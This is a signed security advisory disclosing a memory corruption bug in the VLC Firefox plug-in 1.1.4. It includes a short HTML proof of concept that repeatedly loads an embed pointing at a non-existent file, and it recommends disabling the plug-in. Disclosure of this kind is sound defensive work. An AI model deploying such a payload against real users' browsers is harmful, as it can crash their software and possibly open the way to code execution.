-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
==================================================================================
==================================================================================
VLC Multimedia Firefox Plug-in 1.1.4 non-existant file memory corruption
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on:
Windows 7 professional full patched against Firefox 3.6.10
==================================================================================
==================================================================================
DESCRIPTION:
VLC Media Player offers a plug-in for Firefox to reproduce embedded video/audio
files.
It is possible, passing to "src" parameter a non-existant file (indipendently
of file extension, to cause a memory corruption which could lead into an
arbitrary code execution.
==================================================================================
==================================================================================
PROOF OF CONCEPT:
<html>
<body onload="setTimeout('location.reload()', 100);">
<embed type="application/x-vlc-plugin" src="NonExistantFileName.avi"></embed>
</body>
</html>
==================================================================================
==================================================================================
SOLUTION:
Disable plug-in
==================================================================================
==================================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
iQIcBAEBAgAGBQJMvWLPAAoJELleC2c7YdP1Y6EP/Ruk3uslIJnFhudCofKSkfvA
m8rsP+sdQPqFn+LBXVuVmIlGKArabfRaqe7zHWLf/zI+s63kTQR/x28sJx9bWvwV
sob47+s5Rs8Wcyl48LSx3Wlk4Uvh5D6/DTbvwHHBOorfltp1Rat8iy1ZnYXuVqWH
I/Xi8fw9jw69AG1sfpdJnOE+9gRg1HjlJ81hPLK3SytHytDNw8w2AeFGNVX60MTI
pIIC/EVWrlIDy+Sbwrl7E/h4ZIYA/uuTm8wL68mKwZmhWCRMsIoQX275DfKccHGJ
joGstrHsdOHJzLd7t/FG0K6OWR1iltu4UNCmba/vZiA+sgj/94wHELtN6+3QYq0Y
fSjQIX/3K2w0Pv/t+EbYceoqUgplV1oM5c9iQJUrErlQuhrvv1kYd0hj2IOLDbyt
YBtn5jXxL4cBdGftak4+TIwhQpdZE/x8BGWQPn9WtPgOFgQfr0hvgrdSraFux3nL
S2K6NvUlWKEau2jBh4RZG2MmdWfOEnyEyWnCKteyk4VMc59mKLfKtdncB7FiM7jb
2EZlHPZ2FCawiCHwVvsLgQxXBObK92Y0e+ziAtgilANVSP+zteJVb2YNBKK50dGL
6/bCEEoDx4WWGW2wHHeZEQ4oRl3jkXCakaq65RItaKm4QodV8xsALaqN99FSuofH
xpvokUyG/LPi3G50YPgE
=MKL4
-----END PGP SIGNATURE-----